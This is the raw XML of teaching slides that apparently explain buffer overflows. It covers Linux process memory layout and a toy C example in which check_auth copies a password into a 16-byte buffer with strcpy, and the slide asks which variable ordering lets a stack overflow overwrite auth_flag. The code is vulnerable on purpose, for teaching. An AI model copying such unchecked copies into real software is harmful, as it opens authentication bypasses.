                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="334"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="335"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="335"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="336"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="336"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="337"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="337"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="338"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="338"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="331"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Shape 348"/>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Linux process</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Memory view..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="349" name="Shape 349"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="152400" x="4391475"/>
            <a:ext cy="6600239" cx="4403222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Shape 350"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="257925" x="6865125"/>
            <a:ext cy="416699" cx="20841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0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Shape 351"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6261650" x="6865125"/>
            <a:ext cy="416699" cx="2084100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Shape 352"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1550388" x="216375"/>
            <a:ext cy="4840199" cx="4170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lang="en"/>
              <a:t>This is easier to comprehend when looking at hex code, and using GDB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>hard to comprehend when looking at C/C++ source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>This can differ per OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Windows is different for stack, heap, and shared libraries (.dll in windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Likely the same in BSD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>*Unsure about Solaris</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Shape 353"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5592950" x="1296209"/>
            <a:ext cy="1085399" cx="3137399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Source: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.tenouk.com/Bufferoverflowc/Bufferoverflow1c.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Shape 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3482450" x="4874644"/>
            <a:ext cy="542699" cx="1825500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7500">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55" name="Shape 355"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1213550" x="4874644"/>
            <a:ext cy="677999" cx="1825500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0101">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56" name="Shape 356"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4051116" x="4874644"/>
            <a:ext cy="338100" cx="1825500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="57FF00">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57" name="Shape 357"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4393634" x="4874644"/>
            <a:ext cy="338100" cx="1825500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00FFC9">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358" name="Shape 358"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4743188" x="4874644"/>
            <a:ext cy="1810500" cx="1825500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A00FF">
              <a:alpha val="51980"/>
            </a:srgbClr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Shape 36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Toy Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Shape 36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Take these two code segments</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rPr lang="en"/>
              <a:t>int check_auth(char *password){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>int auth_flag = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  char password_buffer[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>strcpy(password_buffer, password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="365" name="Shape 365"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2415625" x="4282575"/>
            <a:ext cy="4377900" cx="86699"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Shape 366"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2470750" x="4353425"/>
            <a:ext cy="4204499" cx="4645499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int check_auth(char *password){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  char password_buffer[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  int auth_flag = 0;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy(password_buffer, password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="Shape 367"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1595425" x="4621175"/>
            <a:ext cy="889800" cx="4110000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In which one is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auth_flag</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> exploitable by stack overflow?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Shape 368"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5692425" x="809325"/>
            <a:ext cy="1022399" cx="3476099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Think about what gets put on the stack, and the heap, and which way they grow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Shape 369"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5022500" x="4621175"/>
            <a:ext cy="889800" cx="4110000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terminology: for an attacker,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> return auth_flag;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is an </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execution control point</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in one of these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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="368"/>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69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Shape 374"/>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Construct their stacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Shape 375"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704688" x="457200"/>
            <a:ext cy="4840199" cx="8229600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 376"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
